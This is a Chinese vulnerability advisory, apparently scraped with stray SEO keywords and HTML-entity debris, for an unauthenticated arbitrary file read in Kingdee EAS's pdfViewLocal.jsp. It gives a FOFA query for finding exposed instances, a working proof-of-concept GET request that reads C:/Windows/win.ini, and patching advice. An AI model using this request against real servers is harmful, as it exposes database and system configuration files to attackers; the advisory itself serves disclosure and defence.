网站制作困难,台州做网站建设,山东省建设厅招标网站首页,情趣官方网站怎么做代理0x01 产品简介
金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台#xff0c;帮助企业链接外部产业链上下游#xff0c;实现信息共享、风险共担#xff0c;优化生态圈资源配置#xff0c;构筑产业生态的护城河#xff0c;同时打通企业内部价值链的数据链…0x01 产品简介
金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台帮助企业链接外部产业链上下游实现信息共享、风险共担优化生态圈资源配置构筑产业生态的护城河同时打通企业内部价值链的数据链条实现数据不落地管理无断点支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控帮助企业强化核心竞争力。
0x02 漏洞概述
金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞未经身份验证的攻击者可通过该漏洞读取系统重要文件如数据库配置文件、系统配置文件、数据库配置文件等等导致网站处于极度不安全状态。
0x03 复现环境
FOFA
appKingdee-EAS 0x04 漏洞复现
PoC
GET /plt_document/fragments/content/pdfViewLocal.jsp?pathC:/Windows/win.ini HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
读取C:/Windows/win.ini
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
